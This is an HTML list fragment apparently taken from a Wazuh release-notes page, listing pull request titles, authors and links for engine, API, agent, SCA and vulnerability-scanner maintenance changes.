<li>Update GDPR control mappings in SCA rulesets by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Johnng007/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Johnng007">@Johnng007</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4334943692" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35711" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35711/hovercard" href="https://github.com/wazuh/wazuh/pull/35711">#35711</a></li>
<li>Fix flaky API IT by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4339251474" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35724" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35724/hovercard" href="https://github.com/wazuh/wazuh/pull/35724">#35724</a></li>
<li>Fix agents API IT by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344577663" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35746" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35746/hovercard" href="https://github.com/wazuh/wazuh/pull/35746">#35746</a></li>
<li>wazuh-engine: Improve graceful shutdown (fast shudown) by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295945010" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35585" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35585/hovercard" href="https://github.com/wazuh/wazuh/pull/35585">#35585</a></li>
<li>Remove legacy unclassified category by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286531711" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35542" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35542/hovercard" href="https://github.com/wazuh/wazuh/pull/35542">#35542</a></li>
<li>Fix SCA YAML size drift + missing workflow path triggers by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4344646559" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35748" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35748/hovercard" href="https://github.com/wazuh/wazuh/pull/35748">#35748</a></li>
<li>Add cluster validations by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345665261" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35757" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35757/hovercard" href="https://github.com/wazuh/wazuh/pull/35757">#35757</a></li>
<li>Prevent agent.host.ip from being silently dropped when agent IP is empty by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4276470253" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35475" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35475/hovercard" href="https://github.com/wazuh/wazuh/pull/35475">#35475</a></li>
<li>Apply register_configure_agent.sh on reinstall after apt-get remove by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Miguevrgo/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Miguevrgo">@Miguevrgo</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4341282464" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35727" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35727/hovercard" href="https://github.com/wazuh/wazuh/pull/35727">#35727</a></li>
<li>Directory layout improvement by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4307848342" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35622" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35622/hovercard" href="https://github.com/wazuh/wazuh/pull/35622">#35622</a></li>
<li>Improve message handling robustness in wazuh-remoted by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349723703" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35773" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35773/hovercard" href="https://github.com/wazuh/wazuh/pull/35773">#35773</a></li>
<li>Fix stale generated headers after clean by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351458041" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35777" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35777/hovercard" href="https://github.com/wazuh/wazuh/pull/35777">#35777</a></li>
<li>Fix agent 5x sends trailing null byte 0 in messages by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jr0me/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jr0me">@jr0me</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4318176242" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35658" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35658/hovercard" href="https://github.com/wazuh/wazuh/pull/35658">#35658</a></li>
<li>Improve Python security scans - Implementation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jnasselle/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jnasselle">@jnasselle</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4315193169" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35653" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35653/hovercard" href="https://github.com/wazuh/wazuh/pull/35653">#35653</a></li>
<li>Skip vdFirst and polling for vdSync when a feedUpdate occurs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261019633" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35421" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35421/hovercard" href="https://github.com/wazuh/wazuh/pull/35421">#35421</a></li>
<li>Fix SCA integration tests flakiness and deadlocks on Windows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4273984675" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35461" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35461/hovercard" href="https://github.com/wazuh/wazuh/pull/35461">#35461</a></li>
<li>Adapt support-new-oss template by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rafabailon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rafabailon">@rafabailon</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4224695347" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35326" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35326/hovercard" href="https://github.com/wazuh/wazuh/pull/35326">#35326</a></li>
<li>Separate public and private APIs and split OpenAPI specs by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4306895477" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35614" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35614/hovercard" href="https://github.com/wazuh/wazuh/pull/35614">#35614</a></li>
<li>Update decoders and filters Jschemas by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345798927" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35760" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35760/hovercard" href="https://github.com/wazuh/wazuh/pull/35760">#35760</a></li>
<li>engine: Improve devContainer for e2e by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4351235616" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35775" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35775/hovercard" href="https://github.com/wazuh/wazuh/pull/35775">#35775</a></li>
<li>Improve agent name validation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4358518359" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35833" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35833/hovercard" href="https://github.com/wazuh/wazuh/pull/35833">#35833</a></li>
<li>Don't trigger manager checks in draft PR by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360922677" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35842" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35842/hovercard" href="https://github.com/wazuh/wazuh/pull/35842">#35842</a></li>
<li>Don't trigger the agent's PR checks in drafts by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4375256502" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35852" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35852/hovercard" href="https://github.com/wazuh/wazuh/pull/35852">#35852</a></li>
<li>Vulnerability scanner -  CVSSV4.0 support. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345773188" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35759" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35759/hovercard" href="https://github.com/wazuh/wazuh/pull/35759">#35759</a></li>
<li>Change VD provider name by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4377811278" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35863" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35863/hovercard" href="https://github.com/wazuh/wazuh/pull/35863">#35863</a></li>
<li>Send wodle command event in a WCS JSON compatible format. by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4325205883" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35703" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35703/hovercard" href="https://github.com/wazuh/wazuh/pull/35703">#35703</a></li>
<li>Validate user name in API by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TomasTurina/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TomasTurina">@TomasTurina</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378688700" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35866" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35866/hovercard" href="https://github.com/wazuh/wazuh/pull/35866">#35866</a></li>
<li>OS_type field addition to db by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jepalfer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jepalfer">@jepalfer</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4356968162" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35794" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35794/hovercard" href="https://github.com/wazuh/wazuh/pull/35794">#35794</a></li>
<li>Preserve manager files during package upgrades by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ignaciogalle12git/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ignaciogalle12git">@ignaciogalle12git</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4295322691" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35580" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35580/hovercard" href="https://github.com/wazuh/wazuh/pull/35580">#35580</a></li>
<li>Add wazuh.event.id to correlate events from a single log by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jam300/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jam300">@jam300</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360297501" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35840" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35840/hovercard" href="https://github.com/wazuh/wazuh/pull/35840">#35840</a></li>
<li>Add workflow_dispatch to engine unit and integration tests by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/cborla/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/cborla">@cborla</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386050794" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35892" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35892/hovercard" href="https://github.com/wazuh/wazuh/pull/35892">#35892</a></li>
<li>Fix labels for dedicated arm64 runner by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/AlexRuiz7/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/AlexRuiz7">@AlexRuiz7</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4389699154" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35920" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35920/hovercard" href="https://github.com/wazuh/wazuh/pull/35920">#35920</a></li>
<li>Add unit tests and a test tool for the Indexer-Connector Module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4337266014" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35720" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35720/hovercard" href="https://github.com/wazuh/wazuh/pull/35720">#35720</a></li>
<li>wazuh-engine: Async router worker pool by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/matigarciadev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/matigarciadev">@matigarciadev</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4378805375" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35868" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35868/hovercard" href="https://github.com/wazuh/wazuh/pull/35868">#35868</a></li>
<li>Solved the deliminer bug in enrich protocol by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400369318" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35972" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35972/hovercard" href="https://github.com/wazuh/wazuh/pull/35972">#35972</a></li>
<li>Improve manual dispatch for it workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4400183121" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35971" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35971/hovercard" href="https://github.com/wazuh/wazuh/pull/35971">#35971</a></li>
<li>Enhancement/33940 implement use cases by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/LucioDonda/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/LucioDonda">@LucioDonda</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4399409414" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35970" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35970/hovercard" href="https://github.com/wazuh/wazuh/pull/35970">#35970</a></li>
<li>Prevent segfault when stopping disabled vulnerability scanner module by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vikman90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vikman90">@vikman90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4419391253" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36011" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36011/hovercard" href="https://github.com/wazuh/wazuh/pull/36011">#36011</a></li>
<li>Graceful termination via cooperative cancellation by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4392296549" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35953" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35953/hovercard" href="https://github.com/wazuh/wazuh/pull/35953">#35953</a></li>
<li>Fix Coverity findings in SCA, sync protocol, router init, and command cleanup by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/fcontrerasc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/fcontrerasc">@fcontrerasc</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4402971235" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35985" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35985/hovercard" href="https://github.com/wazuh/wazuh/pull/35985">#35985</a></li>
<li>wazuh-engine: Architecture doc by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4421074691" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36028" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36028/hovercard" href="https://github.com/wazuh/wazuh/pull/36028">#36028</a></li>
<li>Engine metrics collection, normalization and indexing by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4349765555" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35774" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35774/hovercard" href="https://github.com/wazuh/wazuh/pull/35774">#35774</a></li>
<li>Remove selinux from manager by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Antoniogm03/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Antoniogm03">@Antoniogm03</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4398765035" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35965" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35965/hovercard" href="https://github.com/wazuh/wazuh/pull/35965">#35965</a></li>
<li>Added new CVE5 fields by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MiguelazoDS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MiguelazoDS">@MiguelazoDS</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4422294945" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36030" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36030/hovercard" href="https://github.com/wazuh/wazuh/pull/36030">#36030</a></li>
<li>Restart Wazuh service on version check  by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hernanvalenzuela/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hernanvalenzuela">@hernanvalenzuela</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4408719168" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36003" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36003/hovercard" href="https://github.com/wazuh/wazuh/pull/36003">#36003</a></li>
<li>Add caller module context to indexer connector logging by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4398070262" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35963" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35963/hovercard" href="https://github.com/wazuh/wazuh/pull/35963">#35963</a></li>
<li>Fix wrong value of wazuh.cluster.name field in metrics indices by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Darioortegaleyva/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Darioortegaleyva">@Darioortegaleyva</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4419482478" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36012" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36012/hovercard" href="https://github.com/wazuh/wazuh/pull/36012">#36012</a></li>
<li>Align threat fields under wazuh by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/NahuFigueroa97/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/NahuFigueroa97">@NahuFigueroa97</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4386693274" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35902" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35902/hovercard" href="https://github.com/wazuh/wazuh/pull/35902">#35902</a></li>
<li>Revert the changes that preserve all configuration files when upgrading an agent by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/MarcelKemp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/MarcelKemp">@MarcelKemp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4431048177" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36050" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36050/hovercard" href="https://github.com/wazuh/wazuh/pull/36050">#36050</a></li>
<li>Add code coverage reporting to legacy unit test workflows by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nicogp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nicogp">@Nicogp</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4429482445" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36047" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36047/hovercard" href="https://github.com/wazuh/wazuh/pull/36047">#36047</a></li>
<li>Update JSON property names in Wodle event by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rjcausarano/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rjcausarano">@rjcausarano</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4423052600" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/36031" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/36031/hovercard" href="https://github.com/wazuh/wazuh/pull/36031">#36031</a></li>
<li>Remove msgpack and pacman from external dependencies by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/jotacarma90/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/jotacarma90">@jotacarma90</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4405569070" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35987" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35987/hovercard" href="https://github.com/wazuh/wazuh/pull/35987">#35987</a></li>
<li>Defer engine sync while indexer is updating by <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/juliancnn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/juliancnn">@juliancnn</a> in <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4391572075" data-permission-text="Title is private" data-url="https://github.com/wazuh/wazuh/issues/35945" data-hovercard-type="pull_request" data-hovercard-url="/wazuh/wazuh/pull/35945/hovercard" href="https://github.com/wazuh/wazuh/pull/35945">#35945</a></li>
